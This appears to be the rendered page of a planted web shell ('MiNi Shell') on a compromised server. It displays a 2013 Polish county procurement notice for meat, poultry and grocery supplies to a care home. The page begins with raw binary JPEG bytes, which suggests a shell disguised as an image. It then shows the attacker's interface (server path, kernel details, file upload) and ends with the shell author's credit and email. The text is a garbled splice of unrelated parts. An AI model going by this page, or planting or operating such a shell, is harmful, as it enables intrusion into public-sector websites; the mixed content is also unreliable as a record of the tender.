JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/345944-N-2013.html

<p class="kh_header"><b>Świdwin: Dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 345944 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DRÓB  I PRZETWORY  DROBIOWE:
Kurczak świeży	kg	250
Porcie rosołowe	kg	450
Piersi z kurczaka	kg	200
Wątroba drobiowakg	160
Ćwiartka tylna    	kg	250
Pieczeń drobiowa 	kg	150
Pasztet drobiowy 	kg	150
Pasztetowa 	kg	120
Blok drobiowy      kg	  90
Mielonki drobiowe	kg	  60
Mozaika drobiowa	kg	70
Rolada Drobiowa 	kg	50
Szynka drobiowa 	kg	80
Schab drobiowy 	kg	40
Parówka drobiowa	kg	170
MIĘSO WIEPRZOWE,WOŁOWE I I WĘDLINY:
Łopatka  z/k    /w/       kg	700
Łopatka b/k    /w/	kg	150
Schab z/k       /w/	kg	240
Schab b/k       /w/	kg	80
Karkówka z/k  /w/	kg	250
Karkówka b/k /w/		kg	100
Żeberka    /w/		kg	200
Wątroba   / w/		kg	70
Boczek świeży /w/	kg	130
Wołowina zrazowa  b/k	kg	80
Parówka     /w/		kg	100
Polędwica  /w/		kg	60
Pasztetowa *		kg	150
Pieczeń wieprzowa *    	kg	90
Blok wieprzowy *		kg	140
Wędzonka wieprzowa*  kg	40
Salceson wieprz.*	kg	120
Szynka wieprzowa wędzona *	kg	130
Szynka wieprzowa prasowana *kg	40
Kiełbasa biała wieprzowa * kg	80
Kiełbasa szynkowa *	kg	140
Kiełbasa krakowska parzona *	kg	150
Kiełbasa żywiecka *		kg	150
Kiełbasa jarmarczna*		kg	300
Kiełbasa kanapkowa *		kg	80
Kiełbasa podwawelska *		kg	70
Kiełbasa piwna *		kg	140
Kiełbasa wczasowa *		kg	150
Kiełbasa tatrzańska *	kg	100
Kaszanka *		kg	180
PRODUKTY SPOŻYWCZE I NAPOJE:
Cukier   biały      	kg	2000
Mąki zbożowe  *  kg	400
Mąka kukurydziana *	kg	100
Kasze *	kg	300
Ryż *                                   		kg	250
Sól                      		kg	150
Bułka tarta		kg	 50
Makarony *		kg	450
Mąka ziemniaczana            		kg	100
Pieprz mielony*		kg	 10
Majeranek/250g/		szt	300
Liść laurowy/12g/		szt.	300
Ziele angielskie/20g/		szt.	350
Groszek konserwowy		kg	250
Koncentrat pomidorowy*		kg	150
Majonez *		kg	120
Musztarda *		kg	150
Herbata*		kg	100
Ketchup		kg	150
Dżemy *		kg	450
Olej*	litr	230
Cukier puder		kg	120
Płatki owsiane		kg	60
Płatki kukurydziane		kg	100
Płatki ryżowe		kg	50
Kawa zbożowa		kg	130
Kompot wiśniowy		kg	300
Kompot czarna porzeczka		kg	150
Kompot wieloowocowy		kg	250
Kompot truskawka		kg	300
Kompot śliwka		kg	200
Syrop owocowy *		kg	250
Soki owocowe i warzywne	litr	950
* dotyczy wszystkich rodzajów danego produktu o różnych nazwach handlowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa  w art.67 ust.1 pkt.7 ustawy Prawo zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.12.20-8, 15.13.11.33-6, 15.83.12.00-4, 15.61.22.00-3, 15.33.21.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od wniesienia przez Wykonawców wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załącznik  Nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załącznik  Nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załącznik  Nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załącznik  Nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załącznik  Nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Modrzewiec 8
78 - 331 Rąbino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 10:00, miejsce: Dom Pomocy Społecznej - Sekretariat
Modrzewiec 8
78 - 331 Rąbino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DRÓB  I PRZETWORY  DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak świeży	15112000-6	kg	250
Porcie rosołowe	151112200-8	kg	450
Piersi z kurczaka  	151112200-8	kg	200
Wątroba drobiowa	15112300-9	kg	160
Ćwiartka tylna       	15112210-1	kg	250
Pieczeń drobiowa *	15131500-0	kg	150
Pasztet drobiowy *	15131500-0	kg	150
Pasztetowa *	15131500-0	kg	120
Blok drobiowy *	15131500-0	kg	  90
Mielonki drobiowe *	15131500-0	kg	  60
Mozaika drobiowa*	15131500-0	kg	70
Rolada Drobiowa *	151131500-0	kg	50
Szynka drobiowa *	151131500-0	kg	80
Schab drobiowy *	151131500-0	kg	40
Parówka drobiowa*	151131500-0	kg	170.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO WIEPRZOWE,WOŁOWE I I WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łopatka  z/k    /w/           	15131400-9	kg	700
Łopatka b/k    /w/	15131400-9	kg	150
Schab z/k       /w/	15131400-9	kg	240
Schab b/k       /w/	15131400-9	kg	80
Karkówka z/k  /w/	15131400-9	kg	250
Karkówka b/k /w/	15131400-9	kg	100
Żeberka    /w/	15131400-9	kg	200
Wątroba   / w/	15131400-9	kg	70
Boczek świeży /w/	15131400-9	kg	130
Wołowina zrazowa  b/k	15111000-9	kg	80
Parówka     /w/	15131133-6	kg	100
Polędwica  /w/	15131133-6	kg	60
Pasztetowa *	15131100-9	kg	150
Pieczeń wieprzowa *       	15131100-6	kg	90
Blok wieprzowy *	15131100-6	kg	140
Wędzonka wieprzowa    *	15131100-6	kg	40
Salceson wieprz.*	15131100-6	kg	120
Szynka wieprzowa wędzona *	15131100-6	kg	130
Szynka wieprzowa prasowana *	15131100-6	kg	40
Kiełbasa biała wieprzowa *	15131100-6	kg	80
Kiełbasa szynkowa *	15131100-6	kg	140
Kiełbasa krakowska parzona *	15131100-6	kg	150
Kiełbasa żywiecka *	15131100-6	kg	150
Kiełbasa jarmarczna*	15131100-6	kg	300
Kiełbasa kanapkowa *	15131100-6	kg	80
Kiełbasa podwawelska *	15131100-6	kg	70
Kiełbasa piwna *	15131100-6	kg	140
Kiełbasa wczasowa *	15131100-6	kg	150
Kiełbasa tatrzańska *	15131100-6	kg	100
Kaszanka *	15131100-6	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRODUKTY SPOŻYWCZE I NAPOJE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier   biały                        	15831200-4	kg	2000
Mąki zbożowe  *             	15612200-3	kg	400
Mąka kukurydziana *	15612210-6	kg	100
Kasze *	15613100-9	kg	300
Ryż *                                   	156141006	kg	250
Sól                      	15872400-5	kg	150
Bułka tarta	15821000-9	kg	 50
Makarony *	15851110-2	kg	450
Mąka ziemniaczana            	15612300-4	kg	100
Pieprz mielony*	15871000-4	kg	 10
Majeranek/250g/	15872300-4	szt	300
Liść laurowy/12g/	15872000-1	szt.	300
Ziele angielskie/20g/	15872300-4	szt.	350
Groszek konserwowy	153311460-	kg	250
Koncentrat pomidorowy*	15331425-2	kg	150
Majonez *	15871273-8	kg	120
Musztarda *	15871273-8	kg	150
Herbata*	15863000-5	kg	100
Ketchup	15871239-5	kg	150
Dżemy *	15332290-3	kg	450
Olej*	15411100-3	litr	230
Cukier puder	15830000-5	kg	120
Płatki owsiane	15613380-5	kg	60
Płatki kukurydziane	15613311-1	kg	100
Płatki ryżowe	15613311-1	kg	50
Kawa zbożowa	15860000-4	kg	130
Kompot wiśniowy	15332100-5	kg	300
Kompot czarna porzeczka	15332411-8	kg	150
Kompot wieloowocowy	15332100-5	kg	250
Kompot truskawka	15332100-5	kg	300
Kompot śliwka	15332100-5	kg	200
Syrop owocowy *	15321000-1	kg	250
Soki owocowe i warzywne	15320000-7	litr	950.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4, 15.61.31.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com